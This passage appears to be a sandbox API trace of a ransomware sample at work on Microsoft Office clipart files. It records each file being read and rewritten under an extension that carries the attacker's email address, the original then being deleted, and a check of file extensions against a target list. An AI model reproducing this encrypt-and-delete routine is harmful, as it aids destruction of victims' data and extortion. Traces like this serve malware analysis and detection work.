[0069.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.075] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf")) returned 1 [0069.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 68 [0069.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 68 [0069.075] lstrlenW (lpString=".doc") returned 4 [0069.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.075] lstrlenW (lpString=".docx") returned 5 [0069.075] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0069.075] lstrlenW (lpString=".pdf") returned 4 [0069.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.075] lstrlenW (lpString=".xls") returned 4 [0069.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.075] lstrlenW (lpString=".xlsx") returned 5 [0069.075] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0069.075] lstrlenW (lpString=".ppt") returned 4 [0069.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 68 [0069.075] lstrlenW (lpString=".zip") returned 4 [0069.076] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.076] lstrlenW (lpString=".rar") returned 4 [0069.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.076] lstrlenW (lpString=".bz2") returned 4 [0069.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.076] lstrlenW (lpString=".7z") returned 3 [0069.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 68 [0069.076] lstrlenW (lpString=".dbf") returned 4 [0069.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 68 [0069.076] lstrlenW (lpString=".1cd") returned 4 [0069.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 68 [0069.076] lstrlenW (lpString=".jpg") returned 4 [0069.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.083] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.083] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.085] GetLastError () returned 0x0 [0069.085] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x829a, lpOverlapped=0x0) returned 1 [0069.123] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x82a0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x82a0, lpOverlapped=0x0) returned 1 [0069.124] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.124] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.124] SetEndOfFile (hFile=0x368) returned 1 [0069.125] CloseHandle (hObject=0x368) returned 1 [0069.125] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.125] SetEndOfFile (hFile=0x340) returned 1 [0069.126] CloseHandle (hObject=0x340) returned 1 [0069.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf")) returned 1 [0069.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 68 [0069.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 68 [0069.126] lstrlenW (lpString=".doc") returned 4 [0069.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.126] lstrlenW (lpString=".docx") returned 5 [0069.126] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0069.126] lstrlenW (lpString=".pdf") returned 4 [0069.127] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.127] lstrlenW (lpString=".xls") returned 4 [0069.127] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.127] lstrlenW (lpString=".xlsx") returned 5 [0069.127] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0069.127] lstrlenW (lpString=".ppt") returned 4 [0069.127] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 68 [0069.127] lstrlenW (lpString=".zip") returned 4 [0069.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.127] lstrlenW (lpString=".rar") returned 4 [0069.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.127] lstrlenW (lpString=".bz2") returned 4 [0069.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.127] lstrlenW (lpString=".7z") returned 3 [0069.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 68 [0069.127] lstrlenW (lpString=".dbf") returned 4 [0069.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 68 [0069.127] lstrlenW (lpString=".1cd") returned 4 [0069.127] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 68 [0069.127] lstrlenW (lpString=".jpg") returned 4 [0069.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.136] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.136] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.141] GetLastError () returned 0x0 [0069.147] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xb758, lpOverlapped=0x0) returned 1 [0069.197] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xb760, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xb760, lpOverlapped=0x0) returned 1 [0069.199] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.199] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.199] SetEndOfFile (hFile=0x38c) returned 1 [0069.199] CloseHandle (hObject=0x38c) returned 1 [0069.199] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.199] SetEndOfFile (hFile=0x370) returned 1 [0069.200] CloseHandle (hObject=0x370) returned 1 [0069.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.200] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf")) returned 1 [0069.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 68 [0069.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 68 [0069.201] lstrlenW (lpString=".doc") returned 4 [0069.201] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.201] lstrlenW (lpString=".docx") returned 5 [0069.201] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0069.201] lstrlenW (lpString=".pdf") returned 4 [0069.201] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.201] lstrlenW (lpString=".xls") returned 4 [0069.201] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.201] lstrlenW (lpString=".xlsx") returned 5 [0069.201] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0069.201] lstrlenW (lpString=".ppt") returned 4 [0069.201] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 68 [0069.201] lstrlenW (lpString=".zip") returned 4 [0069.201] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.201] lstrlenW (lpString=".rar") returned 4 [0069.201] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.201] lstrlenW (lpString=".bz2") returned 4 [0069.201] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.201] lstrlenW (lpString=".7z") returned 3 [0069.201] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 68 [0069.201] lstrlenW (lpString=".dbf") returned 4 [0069.201] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 68 [0069.201] lstrlenW (lpString=".1cd") returned 4 [0069.201] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF") returned 68 [0069.201] lstrlenW (lpString=".jpg") returned 4 [0069.202] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.208] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.209] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.210] GetLastError () returned 0x0 [0069.210] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x60b7, lpOverlapped=0x0) returned 1 [0069.216] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x60c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x60c0, lpOverlapped=0x0) returned 1 [0069.217] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.217] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.217] SetEndOfFile (hFile=0x368) returned 1 [0069.218] CloseHandle (hObject=0x368) returned 1 [0069.218] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.218] SetEndOfFile (hFile=0x384) returned 1 [0069.219] CloseHandle (hObject=0x384) returned 1 [0069.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg")) returned 1 [0069.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 68 [0069.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 68 [0069.219] lstrlenW (lpString=".doc") returned 4 [0069.219] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.219] lstrlenW (lpString=".docx") returned 5 [0069.220] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0069.220] lstrlenW (lpString=".pdf") returned 4 [0069.220] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.220] lstrlenW (lpString=".xls") returned 4 [0069.220] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.220] lstrlenW (lpString=".xlsx") returned 5 [0069.220] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0069.220] lstrlenW (lpString=".ppt") returned 4 [0069.220] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 68 [0069.220] lstrlenW (lpString=".zip") returned 4 [0069.220] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.220] lstrlenW (lpString=".rar") returned 4 [0069.220] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.220] lstrlenW (lpString=".bz2") returned 4 [0069.220] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.220] lstrlenW (lpString=".7z") returned 3 [0069.220] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 68 [0069.220] lstrlenW (lpString=".dbf") returned 4 [0069.220] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 68 [0069.220] lstrlenW (lpString=".1cd") returned 4 [0069.220] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 68 [0069.220] lstrlenW (lpString=".jpg") returned 4 [0069.220] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.221] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.221] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.221] GetLastError () returned 0x0 [0069.221] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4752, lpOverlapped=0x0) returned 1 [0069.231] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4760, lpOverlapped=0x0) returned 1 [0069.233] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.233] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.233] SetEndOfFile (hFile=0x368) returned 1 [0069.233] CloseHandle (hObject=0x368) returned 1 [0069.233] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.233] SetEndOfFile (hFile=0x384) returned 1 [0069.234] CloseHandle (hObject=0x384) returned 1 [0069.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.234] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg")) returned 1 [0069.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 68 [0069.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 68 [0069.235] lstrlenW (lpString=".doc") returned 4 [0069.235] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.235] lstrlenW (lpString=".docx") returned 5 [0069.235] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0069.235] lstrlenW (lpString=".pdf") returned 4 [0069.235] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.235] lstrlenW (lpString=".xls") returned 4 [0069.235] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.235] lstrlenW (lpString=".xlsx") returned 5 [0069.235] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0069.235] lstrlenW (lpString=".ppt") returned 4 [0069.235] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 68 [0069.235] lstrlenW (lpString=".zip") returned 4 [0069.235] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.235] lstrlenW (lpString=".rar") returned 4 [0069.235] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.235] lstrlenW (lpString=".bz2") returned 4 [0069.235] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.235] lstrlenW (lpString=".7z") returned 3 [0069.235] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 68 [0069.235] lstrlenW (lpString=".dbf") returned 4 [0069.235] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 68 [0069.235] lstrlenW (lpString=".1cd") returned 4 [0069.235] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 68 [0069.235] lstrlenW (lpString=".jpg") returned 4 [0069.235] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.241] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.241] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.245] GetLastError () returned 0x0 [0069.245] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x559a, lpOverlapped=0x0) returned 1 [0069.261] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x55a0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x55a0, lpOverlapped=0x0) returned 1 [0069.262] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.262] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.262] SetEndOfFile (hFile=0x370) returned 1 [0069.262] CloseHandle (hObject=0x370) returned 1 [0069.262] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.262] SetEndOfFile (hFile=0x340) returned 1 [0069.264] CloseHandle (hObject=0x340) returned 1 [0069.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.264] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg")) returned 1 [0069.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 68 [0069.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 68 [0069.264] lstrlenW (lpString=".doc") returned 4 [0069.264] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.264] lstrlenW (lpString=".docx") returned 5 [0069.264] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0069.264] lstrlenW (lpString=".pdf") returned 4 [0069.264] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.264] lstrlenW (lpString=".xls") returned 4 [0069.264] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.265] lstrlenW (lpString=".xlsx") returned 5 [0069.265] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0069.265] lstrlenW (lpString=".ppt") returned 4 [0069.265] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 68 [0069.265] lstrlenW (lpString=".zip") returned 4 [0069.265] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.265] lstrlenW (lpString=".rar") returned 4 [0069.265] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.265] lstrlenW (lpString=".bz2") returned 4 [0069.265] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.265] lstrlenW (lpString=".7z") returned 3 [0069.265] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.265] lstrlenW (lpString="C:\\Program Files\\Microsoft 